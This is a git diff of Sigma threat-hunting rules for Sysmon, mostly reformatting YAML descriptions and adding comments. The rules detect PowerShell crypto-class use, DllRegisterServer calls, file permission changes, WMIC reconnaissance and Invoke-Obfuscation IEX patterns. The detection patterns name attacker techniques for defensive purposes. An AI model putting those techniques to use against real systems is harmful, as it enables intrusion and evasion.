https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic - https://github.com/med0x2e/vba2clr diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml index ce82e042a..b58a2847b 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml @@ -1,8 +1,7 @@ title: Unusually Long PowerShell CommandLine id: d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 status: test -description: Detects unusually long PowerShell command lines with a length of 1000 - characters or more +description: Detects unusually long PowerShell command lines with a length of 1000 characters or more references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova @@ -21,16 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_powershell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows Powershell - - Product: PowerShell Core 6 + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows Powershell + - Product: PowerShell Core 6 selection_length: - CommandLine|re: .{1000,} + CommandLine|re: .{1000,} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml index 29da1abb3..8a4534acc 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml @@ -1,15 +1,10 @@ title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace id: ad856965-f44d-42a8-945e-bbf7bd03d05a status: experimental -description: 'Detects the invocation of PowerShell commands with references to classes - from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html @@ -30,16 +25,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet_namespace: - CommandLine|contains: System.Security.Cryptography. + CommandLine|contains: System.Security.Cryptography. selection_cmdlet_classes: - CommandLine|contains: + CommandLine|contains: - .AesCryptoServiceProvider - .DESCryptoServiceProvider - .DSACryptoServiceProvider @@ -49,7 +44,6 @@ detection: - .TripleDESCryptoServiceProvider condition: process_creation and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml index 7594cac8d..8ff920d0b 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml @@ -1,8 +1,7 @@ title: Import New Module Via PowerShell CommandLine id: 4ad74d01-f48c-42d0-b88c-b31efa4d2262 status: experimental -description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets - to the current PowerShell session +description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1 @@ -21,26 +20,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' filter_main_vsstudio: ParentImage|contains: - :\Program Files\WindowsApps\Microsoft.WindowsTerminal_ - :\Windows\System32\cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - :\Program Files\Microsoft Visual Studio\ - Tools\Microsoft.VisualStudio.DevShell.dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Depending on the environement, many legitimate scripts will import modules inline. - This rule is targeted for hunting purposes. + - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml index dade8d988..6ef508413 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml @@ -1,16 +1,12 @@ title: Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly id: ce2c44b5-a6ac-412a-afba-9e89326fa972 related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: similar + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: similar status: experimental -description: 'Detects execution of regsvr32 with the silent flag and no other flags - on a DLL located in an uncommon or potentially suspicious location. - - When Regsvr32 is called in such a way, it implicitly calls the DLL export function - ''DllRegisterServer''. - - ' +description: | + Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. + When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection @@ -31,33 +27,33 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cmdline: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' /e ' filter_main_paths: - - CommandLine|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ - - CurrentDirectory|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ + - CommandLine|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ + - CurrentDirectory|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ filter_main_other_flags: - CommandLine|contains: + # Note: We filter other flags to keep the logic of the rule + CommandLine|contains: - ' /i:' - '/U ' filter_main_rpcproxy: ParentCommandLine|endswith: :\Windows\System32\RpcProxy\RpcProxy.dll - CommandLine: regsvr32 /s rpcproxy.dll + CommandLine: regsvr32 /s rpcproxy.dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml index 13766bd22..af83eb631 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml @@ -1,14 +1,11 @@ title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly id: d81a9fc6-55db-4461-b962-0e78fea5b0ad related: - - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed - type: similar + - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32 + type: similar status: experimental -description: 'Detects when the DLL export function ''DllRegisterServer'' is called - in the commandline by Rundll32 explicitly where the DLL is located in a non-standard - path. - - ' +description: | + Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior @@ -28,21 +25,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cmdline: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter_main_legit_paths: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86) - :\Program Files\ - :\Windows\System32\ - :\Windows\SysWOW64\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. - - Not every instance is considered malicious, but this rule will capture the malicious - usages. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. + - Not every instance is considered malicious, but this rule will capture the malicious usages. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml index 8b8386f82..c5188e9a4 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Compression Tool Parameters id: 27a72a60-7e5e-47b1-9d17-909c9abafdcd status: test -description: Detects potentially suspicious command line arguments of common data - compression tools +description: Detects potentially suspicious command line arguments of common data compression tools references: - https://twitter.com/SBousseaden/status/1184067445612535811 author: Florian Roth (Nextron Systems), Samir Bousseaden @@ -25,7 +24,7 @@ detection: - 7z*.exe - '*rar.exe' - '*Command*Line*RAR*' - CommandLine|contains: + CommandLine|contains: - ' -p' - ' -ta' - ' -tb' diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml index 2ad637111..33a529e6d 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml @@ -1,14 +1,11 @@ title: Elevated System Shell Spawned id: 61065c72-5d7d-44ef-bf41-6a36684b545f related: - - id: 178e615d-e666-498b-9630-9ed363038101 - type: similar + - id: 178e615d-e666-498b-9630-9ed363038101 + type: similar status: experimental -description: 'Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges. Use this rule to hunt for potential suspicious - processes. - - ' +description: | + Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. references: - https://github.com/Wh04m1001/SysmonEoP author: Nasreddine Bencherchali (Nextron Systems), frack113 @@ -28,16 +25,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_shell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI LogonId: '0x3e7' diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml index 65d888497..8a6bdef79 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml @@ -1,14 +1,11 @@ title: EventLog Query Requests By Builtin Utilities id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f related: - - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf - type: derived + - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf + type: derived status: experimental -description: 'Detect attempts to query the contents of the event log using command - line utilities. Attackers use this technique in order to look for sensitive information - in the logs such as passwords, usernames, IPs, etc. - - ' +description: | + Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1 @@ -29,27 +26,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - Image|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - Image|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - Image|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - Image|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' - condition: process_creation and (selection_wmi or all of selection_wevtutil_* - or all of selection_wmic_* or selection_cmdlet) + condition: process_creation and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet) falsepositives: - Legitimate log access by administrators or troubleshooting tools level: medium diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml index c676d9594..72e3eed4f 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml @@ -25,31 +25,29 @@ detection: Image|endswith: - \cacls.exe - \icacls.exe - - \net.exe - - \net1.exe - CommandLine|contains: + - \net.exe # "grant" Option available when used with "net share" + - \net1.exe # "grant" Option available when used with "net share" + CommandLine|contains: - /grant - /setowner - - /inheritance:r + - /inheritance:r # Remove all inherited ACEs selection_2: Image|endswith: \attrib.exe - CommandLine|contains: -r + CommandLine|contains: -r selection_3: - Image|endswith: \takeown.exe + Image|endswith: \takeown.exe # If this generates FP in your environment. Comment it out or add more suspicious flags and locations filter_optional_dynatrace_1: - CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history - /reset + CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history /reset filter_optional_dynatrace_2: - CommandLine|contains|all: - - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant - :r ' + CommandLine|contains|all: + - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - S-1-5-19:F filter_optional_vscode: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Programs\Microsoft VS Code - :\Program Files\Microsoft VS Code filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86)\Avira - :\Program Files\Avira condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml index 9a7484f3e..47d9b9b51 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml @@ -1,14 +1,9 @@ title: Process Terminated Via Taskkill id: 86085955-ea48-42a2-9dd3-85d4c36b167d status: experimental -description: 'Detects execution of "taskkill.exe" in order to stop a service or a - process. Look for suspicious parents executing this command in order to hunt for - potential malicious activity. - - Attackers might leverage this in order to conduct data destruction or data encrypted - for impact on the data stores of services like Exchange and SQL Server. - - ' +description: | + Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. + Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process author: frack113 @@ -27,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \taskkill.exe - - OriginalFileName: taskkill.exe + - Image|endswith: \taskkill.exe + - OriginalFileName: taskkill.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /f' - ' /im ' filter_main_installers: @@ -40,7 +35,6 @@ detection: ParentImage|endswith: .tmp condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Expected FP with some processes using this techniques to terminate one of their - processes during installations and updates + - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml index 09c9aa448..f9112e7e0 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml @@ -1,18 +1,13 @@ title: System Information Discovery Via Wmic.EXE id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e related: - - id: 9d5a1274-922a-49d0-87f3-8c653483b909 - type: derived + - id: 9d5a1274-922a-49d0-87f3-8c653483b909 + type: derived status: experimental -description: 'Detects the use of the WMI command-line (WMIC) utility to identify and - display various system information, - - including OS, CPU, GPU, disk drive names, memory capacity, display resolution, - baseboard, BIOS, - +description: | + Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, + including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ @@ -36,13 +31,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wmic: - - Description: WMI Commandline Utility - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - Description: WMI Commandline Utility + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_get: - CommandLine|contains: get + CommandLine|contains: get selection_classes: - CommandLine|contains: + CommandLine|contains: - baseboard - bios - cpu @@ -54,7 +49,7 @@ detection: - startup - win32_videocontroller selection_attributes: - CommandLine|contains: + CommandLine|contains: - caption - command - driverversion @@ -71,5 +66,6 @@ detection: condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - VMWare Tools serviceDiscovery scripts +# Note: Might be upgraded to a medium detection rules after some time level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml index 524d7d7b6..f7aeac039 100644 --- a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml +++ b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml @@ -1,12 +1,10 @@ title: Microsoft Office Trusted Location Updated id: a0bed973-45fa-4625-adb5-6ecdf9be70ac related: - - id: f742bde7-9528-42e5-bd82-84f51a8387d2 - type: similar + - id: f742bde7-9528-42e5-bd82-84f51a8387d2 + type: similar status: experimental -description: Detects changes to the registry keys related to "Trusted Location" of - Microsoft Office. Attackers might add additional trusted locations to avoid macro - security restrictions. +description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. references: - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 author: Nasreddine Bencherchali (Nextron Systems) @@ -36,7 +34,6 @@ detection: - :\Program Files (x86)\Microsoft Office\ condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - During office installations or setup, trusted locations are added, which will - trigger this rule. + - During office installations or setup, trusted locations are added, which will trigger this rule. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml index 196d50826..608366673 100644 --- a/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml +++ b/sigma/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml @@ -1,15 +1,10 @@ title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace id: 1c2a3268-3881-414a-80af-a5b313b14c0e status: experimental -description: 'Detects the setting of a registry inside the "\Shell\Open\Command" value - with PowerShell classes from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/ @@ -30,7 +25,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_key: - EventType: SetValue + EventType: SetValue TargetObject|contains: \Shell\Open\Command selection_value_img: Details|contains: @@ -49,7 +44,6 @@ detection: - .TripleDESCryptoServiceProvider condition: registry_set and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml b/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml index e032f471a..bbbbfa677 100644 --- a/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml +++ b/sigma/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml @@ -1,9 +1,7 @@ title: Possible DNS Rebinding id: eb07e747-2552-44cd-af36-b659ae0958e4 status: unsupported -description: Detects several different DNS-answers by one domain with IPs from internal - and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will - saved in host cache for a while TTL). +description: Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL). references: - https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 author: Ilyas Ochkov, oscd.community @@ -45,7 +43,6 @@ detection: - (::ffff:)?172.31. - (::ffff:)?127. timeframe: 30s - condition: (dns_query and (dns_answer and filter_int_ip) and (dns_answer and not - filter_int_ip)) | count(QueryName) by ComputerName > 3 + condition: (dns_query and (dns_answer and filter_int_ip) and (dns_answer and not filter_int_ip)) | count(QueryName) by ComputerName > 3 level: medium ruletype: Sigma diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml index f0dc51383..adf9e74d6 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation CLIP+ Launcher id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 related: - - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 - type: derived + - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of Clip.exe to execute PowerShell status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2021/09/16 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 26) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml index c82a0c6c2..8dc147323 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml @@ -1,10 +1,9 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 related: - - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 - type: derived -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework (See reference section for code block) + - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 + type: derived +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block) references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 status: unsupported @@ -23,13 +22,13 @@ detection: EventID: 6 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - ImagePath|re: \\*mdr\*\W\s*\)\.Name - - ImagePath|re: \$VerbosePreference\.ToString\( - - ImagePath|re: \String\]\s*\$VerbosePreference + - ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - ImagePath|re: \\*mdr\*\W\s*\)\.Name + - ImagePath|re: \$VerbosePreference\.ToString\( + - ImagePath|re: \String\]\s*\$VerbosePreference condition: driver_load and selection falsepositives: - Unknown diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml index 9a845c096..fb7ac33b4 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation STDIN+ Launcher id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e related: - - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 - type: derived + - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of stdin to execute PowerShell status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 25) tags: - attack.defense_evasion - attack.t1027 diff --git a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml index cd7a303ae..7d84ef66e 100644 --- a/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml +++ b/sigma/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml @@ -1,15 +1,15 @@ title: Invoke-Obfuscation VAR+ Launcher id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc related: - - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 - type: derived + - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 + type: derived description: Detects Obfuscated use of Environment Variables to execute PowerShell status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 24) tags: - 